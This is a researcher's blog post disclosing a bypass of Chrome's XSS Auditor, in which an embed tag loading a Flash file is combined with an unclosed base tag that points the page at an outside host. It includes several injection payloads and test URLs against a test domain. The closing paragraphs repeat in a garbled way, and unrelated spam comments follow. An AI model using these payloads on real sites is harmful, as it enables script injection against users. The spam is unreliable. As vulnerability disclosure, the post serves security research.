Mario discovered this bypass:
Also I found an another bypass. In this post, I would like to share my vector.XSS Auditor Bypasses 05.2016https://t.co/c9UcjpDZZM— .mario (@0x6D6172696F) 2016年5月17日
(someone asked for PoC and test-case, here you are)
I have filed this bug on: https://bugs.chromium.org/p/chromium/issues/detail?id=612672
The vector is this:
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>Let's take a look at the process until reaching this bypass.
It is blocked to fetch the external resources using the
<embed>:https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=https://evil/>
<embed src=https://evil/>But it is not blocked to fetch any same-origin resources having no query string:
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=/aaa>
<embed src=/aaa>So, if we can change the base URL, it is possible to do XSS attacks.
The
base tag is also blocked but if it is not closed with >, Auditor does not block in some cases.The following case is blocked:
https://vulnerabledoma.in/xss_auditortest?test=3&q=<base+href=//evil/
<div><base href=//evil/ </div>But the following case is not blocked:
https://vulnerabledoma.in/xss_auditortest?test=1&q=<base+href=//evil/
<div><base href=//evil/</div>Can you see the difference? The former page exists a white space behind the injection point. It seems it is blocked by Auditor if the page has a white space directly behind the injection point. In other words, we can inject a base tag without being blocked if the page does not have a white space directly behind the injection point.
Thus, my vector works!
https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href=//l0.cm/
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>So, can't we always bypass if the page has a white space directly behind? No! We still have a chance to bypass.
If the
"' characters exists under the injection point, we can bypass Auditor using the unclosed attribute quotes, like <base href="//evil/.It is not blocked in the following condition:
https://vulnerabledoma.in/xss_auditortest?test=4&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href="//l0.cm/
<div>
<embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/
</div><div id="x">AAA</div>
I think this bypass is useful because most pages have the
FYI, also
https://vulnerabledoma.in/xss_auditortest?test=1&q=%3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
Thus, I used Flash.
That's all. Thanks for reading my post :)
"' characters under the injection point.FYI, also
<script src=/xss.js></script><base href=//evil/ is not blocked. But we can't load the external resource because the loading is started before the base URL is set:https://vulnerabledoma.in/xss_auditortest?test=1&q=%3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
Thus, I used Flash.
That's all. Thanks for reading my post :)
Aivivu chuyên vé máy bay, tham khảo
ReplyDeletevé máy bay tết 2021 Vietnam Airline
gia ve may bay di my
vé máy bay đi Pháp giá rẻ 2020
vé máy bay đi hàn quốc khứ hồi bao nhiêu tiền
giá vé máy bay đi nhật bản vietnam airline
giá vé máy bay sang Anh quốc
đặt vé máy bay giá rẻ ở đâu
Mua vé máy bay tại Aivivu, tham khảo
ReplyDeletevé máy bay đi Mỹ tháng nào rẻ nhất
gia ve may bay ve vn
vé máy bay từ anh về việt nam
chuyến bay từ pháp về việt nam
เว็บพนัน 168 easy to play
ReplyDeleteLooking at this article, I miss the time when I didn't wear a mask. majorsite Hopefully this corona will end soon. My blog is a blog that mainly posts pictures of daily life before Corona and landscapes at that time. If you want to remember that time again, please visit us.
ReplyDeleteđại lý vé máy bay China Airlines
ReplyDeleteđổi ngày vé máy bay Japan Airlines
mua thêm hành lý của Eva Air
Very informative and helpful post. Keep posting. Vinyl Fence Installation Amarillo, TX
ReplyDelete
ReplyDeleteThanks sharing valuable information..
Thanks for sharing a beautiful blog. I got an information from your blog. Keep sharing
lawyers for bankruptcy near me